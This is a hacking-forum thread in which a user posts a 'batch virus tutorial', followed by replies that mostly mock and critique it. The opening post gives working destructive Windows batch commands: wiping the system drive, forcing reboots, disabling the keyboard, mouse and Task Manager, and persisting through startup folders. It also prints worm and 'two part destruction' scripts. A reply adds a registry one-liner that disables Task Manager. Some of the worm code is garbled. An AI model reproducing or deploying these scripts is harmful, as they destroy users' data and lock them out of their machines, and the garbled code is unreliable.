Batch Virus Tutorial

[Xedafen]

-+Introduction To Batch Viruses By Xed+-
If you are going to make a virus of ANY type, using any language, I suggest learning how to create batch viruses first. Why? Its simple, and it will give you a clear understanding how viruses work through simple terms, so when you go on to create better viruses, you have an idea of what your doing. Also, this is STRICTLY FOR EDUCATIONAL PURPOSES ONLY. Lastly, I would like to say batch viruses are very easy to spot, and are not that hard to make. Why? Because tons of info on them form the 90's are being released due to the fact they are outdated. And, viruses now a days want to steal information and money, not destroy your computer. And do not think that after reading my tutorial you will be some L33t Hakx0r, this is just bare bones ideas of a virus. What we will be going over: Worms, computer destruction, deleted files, annoying things, and how to mess someone up BAD.


-+Basic Commands+-
When creating a batch virus, some key commands that I believe are necessary to making a virus are:

+To delete PC's System Drive:

Code: [Select]

del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

+To disable keyboard:

Code: [Select]

rundll32 keyboard,disable
rundll32 mouse,disable

+To add itself to startup:

Code: [Select]

copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

+To Disable task manager:

Code: [Select]

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
start /w regedit /s %WINDIR%\DXM.reg



+To disable shutdown

Code: [Select]

icacls %windir%\system32\shutdown.exe /deny SID:D


+Extras
Copy %0 (Directory):Copies the running file to whatever specified place, however NOT executable's. This is useful for making a worm, copy it to popular folders and such to make sure your virus spreads and doesnt leave.


Start (Whatever.whatever): This can start another program or file up, useful for spamming pop ups and other viruses.


kill (Specified program): Ends the process of a program, useful for disabling antivirus and such.



-+Example Worms+-
Now that I gave you the basics of popular virus commands do and what they are, here are some code examples that I have broken down for you to understand.




PROTEUS WORM BREAK DOWN

Code: [Select]

@echo offclsIf exist c:scar.txt goto MsgBoxIf not exist c:scar.txt goto scar_computer:Scar_computerecho This computer has already been infected by Proteus > > c:scar.txtecho Cancel start up of worm and move on to next command > > c:scar.txtecho If this file is deleted then the worm will not skip your computer and > > c:scar.txtecho you will be infected again > > c:scar.txtecho  > > c:scar.txtecho 2003 > > c:scar.txtecho 0SYSTEMHACKER0 ©> > c:scar.txtgoto WormKazaa:MsgBoxecho MsgBox "Unable to open program due to out of system resources", vbCritical, "Unable to open file" > > c:MsgBox.vbsStart c:MsgBox.vbsgoto end:WormKazaaCopy %0 C:ProgramFilesKaZaAMySharedFolderMatrix2.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-legged-freaks.vid.batCopy %0 C:Program FilesKaZaAMy Shared FolderPassword_finder.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folders-club7.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderJackAss the movie.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folderpassword hacker.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderNorton anti virus.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-mile.mpg.batCopy %0 C:Program FilesKaZaAMy Shared Folderkazaa.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folderrealplayer.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderMyPic.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderBill gates *very funny*.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderBill gates *very funny*.mpg.batCopy %0 C:Program FilesKaZaAMy Shared Folderwindows xp.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderHow to make viruses.txt.batCopy %0 C:Program FilesKaZaAMy Shared Folder*very funny*.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderHow to stop worm viruses.txt.batgoto MainBody:MainBodycd c:md Aboutecho Proteus > > C:AboutProteus.txtecho  > > C:AboutProteus.txtecho Proteus P2P KaZaA worm > > C:AboutProteus.txtecho was made by 0SYSTEMHACKER0> > C:AboutProteus.txtecho Proteus will not infect the same computer twice > > C:AboutProteus.txtecho you have already been infected > > C:AboutProteus.txtecho  > > C:AboutProteus.txtecho You cannot stop what cannot be stopped! > > C:AboutProteus.txtecho Proteus > > C:AboutProteus.txtecho 2003 © > > C:AboutProteus.txtgoto MsgBox:endEnd

TWO PART DESTRUCTION BREAKDOWN (You might of heard of this simple virus before, it was known as tpd.zip)

Code: [Select]

t.bat
@echo off
::First thing it does is copy itself to startup, this is where i got the code.
:t
copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg


goto p


:p
::starts part 2 of the virus
start tp.bat
::Deletes c drive (Also where I got the code)

del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


tp.bat
@echo off
Title Hacked
color 0a
:tpd
cls
echo.
echo.
echo.
echo You've been hacked.
::Fake text
start tp.bat
goto tpd
::Spams this same program over and over to make it so exiting out of the real virus, t.bat is hard


A simple virus I made

Code: [Select]

@echo off
::Copying to startup

copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg


shutdown -r -f -t 00
::Shuts down the computer whenever its started up. Evil, I know, but this is evilzone is it not?

-+Closing+-
Hope this little tutorial helped. Pm me for more info and make sure to add any suggestions in the comments. I think I will do a browser virus tutorial next, since I have never, ever seen one done before on the internet. And btw, not sure why this screwed up when i posted it. Maybe a mod could help. It made the text (As you see) Faded, and most of the Proteus worm is messed up and out of whack, not sure why. Heres the link to the Proteus worm for the complete code, but without my breakdown, in case you cannot read the code above.
http://www.rohitab.com/discuss/topic/541-batch-worm-made-by-0systemhacker0/page-2

[Kulverstukas]

Holy bbcode abuse batman!

@OP I'm giving you few hours to fix this post, or it goes to trash, kk.

[Deque]

I don't think you know what you are doing there.

+To add itself to startup:

copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

copy ".bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
This won't work if:

• The user does not have an english operating system
• Windows is not installed on drive C

Usually I'd say: Have you ever heard of environmental variables? But you actually do, because you use them later. But why not here? Did you just copy & paste different snippets into one script? That would explain a lot, e.g., the inconsistency in capitalization, and the explanations that do not fit to the code.

copy ".bat" "C:\"
copy ".bat" "%userprofile%\My Documents"
This does not do anything to be run at startup.

ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg
Neither does this. You just write the beginning of a .reg file. This actually belongs to the next section.

+To Disable task manager:

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg


echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg


start /w regedit /s %WINDIR%\DXM.reg

Do you realize that you wrote the same registry entry two times?

And why so complicated? Why write and start a .reg file instead of calling reg.exe directly?
You will achieve the same with just one line.

Code: [Select]

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1

kill (Specified program): Ends the process of a program, useful for disabling antivirus and such.

You can't just kill antivirus processes. They protect themselves by, e.g., by SSDT-Hooking.

.Copy %0 C:ProgramFilesKaZaAMySharedFolderMatrix2.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-legged-freaks.vid.batCopy %0 C:Program FilesKaZaAMy Shared FolderPassword_finder.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folders-club7.bmp.batCopy %0 C:Program FilesKaZaAMy Shared FolderJackAss the movie.vid.batCopy %0 C:Program FilesKaZaAMy Shared Folderpassword hacker.exe.batCopy %0 C:Program FilesKaZaAMy Shared FolderNorton anti virus.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folder8-mile.mpg.batCopy %0 C:Program FilesKaZaAMy Shared Folderkazaa.exe.batCopy %0 C:Program FilesKaZaAMy Shared Folderrealplayer.exe.batCopy %0 C:Program
...

Do you realize that this is just fucked up code? Path separators are missing, newlines are missing, this code will not run. Where did you copy it from?

But most importantly: You did not create a virus.
Look up the definition. You made a malicious file, no doubt, but this is nothing else than a little piece of crap. Copying your file in some frequently used folders does not spread (to other systems) nor execute your malware. So what is even the purpose of this?
Your "virus" does not infect any files, it can not spread, and the replication is a joke. Even if it could spread, it would not have a chance to, because the payload is meant to be destructive instantly.

This is not HF.

[RedBullAddicted]

Deque.. you are just awesome.  Not more to say

[Killordie]

To the OP: You should really learn to program first or get general computer knowledge before trying anything funky.
Deque really picked him apart lol.

[Kulverstukas]

Damn, because of Deque this thread received some value... can't remove it anymore +1 deque.

[Nortcele]

@Deque just raped this thread.

[Killeramor]

@Deque, Wow man. This thread is informative now. I now know what not to do with that code. haha

[Xedafen]

But most importantly: You did not create a virus.
Look up the definition. You made a malicious file, no doubt, but this is nothing else than a little piece of crap. Copying your file in some frequently used folders does not spread (to other systems) nor execute your malware. So what is even the purpose of this?
Your "virus" does not infect any files, it can not spread, and the replication is a joke. Even if it could spread, it would not have a chance to, because the payload is meant to be destructive instantly.

This is not HF.

You probably know more than me, and I listen. If anything what you said helped me, so thank you. However I would like to clarify things. 1. I know the code is messed up, as you can see in my closing I tried to ask a mod to fix it because no matter how many times I modified it it would not copy right, thats why I added a link to the full code. Secondly, I DID just copy and paste the code, like you pointed out even though I already said it (i.e. "This is where I got it from"). Thirdly, the copying to startup does work, I have tested it. And, most copies of windows ARE on the c drive, and this is an english board, therefore I assumed there would only be english operating systems. Like I also said, this was not meant to be actually used, no one is going to download a .bat file thinking its something else, this was just meant for learning purposes. And lastly, this IS a virus. "A piece of code that is capable of copying itself and typically has a detrimental effect, such as corrupting the system or destroying data." And thats exactly what this does. All this was, was a simple tutorial of the basics of what a virus do, thats all it was meant to be, nothing more. And again, thank you, because I learned more about this topic.

[Kulverstukas]

You probably know more than me, and I listen. If anything what you said helped me, so thank you. However I would like to clarify things. 1. I know the code is messed up, as you can see in my closing I tried to ask a mod to fix it because no matter how many times I modified it it would not copy right, thats why I added a link to the full code. Secondly, I DID just copy and paste the code, like you pointed out even though I already said it (i.e. "This is where I got it from"). Thirdly, the copying to startup does work, I have tested it. And, most copies of windows ARE on the c drive, and this is an english board, therefore I assumed there would only be english operating systems. Like I also said, this was not meant to be actually used, no one is going to download a .bat file thinking its something else, this was just meant for learning purposes. And lastly, this IS a virus. "A piece of code that is capable of copying itself and typically has a detrimental effect, such as corrupting the system or destroying data." And thats exactly what this does. All this was, was a simple tutorial of the basics of what a virus do, thats all it was meant to be, nothing more. And again, thank you, because I learned more about this topic.

We want results, not excuses. Format your damn post now, since I can't remove this thread because Deque just retitled this as "How NOT to code in batch". Also this is hardly a tutorial...

[Xedafen]

We want results, not excuses. Format your damn post now, since I can't remove this thread because Deque just retitled this as "How NOT to code in batch". Also this is hardly a tutorial...

Okay I fixed it. I am legitimately sorry. All I wanted was to share what I thought was a tutorial.

[Kulverstukas]

Okay I fixed it. I am legitimately sorry. All I wanted was to share what I thought was a tutorial.

No worries. Keep at it, accept criticism and you'll become l33t like us one day!

[Xedafen]

No worries. Keep at it, accept criticism and you'll become l33t like us one day!

XD okay

[iTpHo3NiX]

Shameless plug:
https://evilzone.org/projects-and-discussion/breakdown-of-itstealer-2-0-batch-file/msg314/#msg314

[Nortcele]

Shameless plug:
https://evilzone.org/projects-and-discussion/breakdown-of-itstealer-2-0-batch-file/msg314/#msg314

He should hang his head in shame.